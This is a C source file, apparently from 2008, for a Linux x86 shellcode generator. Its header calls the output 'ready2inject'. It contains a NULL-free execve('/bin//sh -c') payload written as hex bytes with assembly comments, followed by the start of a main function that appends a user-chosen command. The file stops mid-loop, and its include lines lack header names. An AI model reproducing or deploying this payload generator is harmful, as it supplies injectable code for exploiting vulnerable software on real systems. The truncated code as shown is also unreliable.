/** * * BlackLight's shellcode generator for Linux x86 * Tested anywhere, working & NULL-free * * Usage: ./generator * ...and then you've got a ready2inject NULL-free shellcode for the command you like * * copyleft 2008 by BlackLight * < http://blacklight.gotdns.org > * * Released under GPL v.3 licence * * Greetz to: evilsocket, for the idea he gave me ;) * Greetz to: my friends, who tested, used and appreciated this code and helped * me to improve it to what it is now * Greetz to: my girl, next to me in any moment even if she had no idea * about what I was doing ^^ */ #include #include #include char code[] = "\\x60" /*pusha*/ "\\x31\\xc0" /*xor %eax,%eax*/ "\\x31\\xd2" /*xor %edx,%edx*/ "\\xb0\\x0b" /*mov $0xb,%al*/ "\\x52" /*push %edx*/ "\\x68\\x6e\\x2f\\x73\\x68" /*push $0x68732f6e*/ "\\x68\\x2f\\x2f\\x62\\x69" /*push $0x69622f2f*/ "\\x89\\xe3" /*mov %esp,%ebx*/ "\\x52" /*push %edx*/ "\\x68\\x2d\\x63\\x63\\x63" /*push $0x6363632d*/ "\\x89\\xe1" /*mov %esp,%ecx*/ "\\x52" /*push %edx*/ "\\xeb\\x07" /*jmp 804839a */ "\\x51" /*push %ecx*/ "\\x53" /*push %ebx*/ "\\x89\\xe1" /*mov %esp,%ecx*/ "\\xcd\\x80" /*int $0x80*/ "\\x61" /*popa*/ "\\xe8\\xf4\\xff\\xff\\xff" /*call 8048393 */; int main (int argc, char **argv) { int i,len=0; char *shell,*cmd; if (!argv[1]) exit(1); for (i=1; i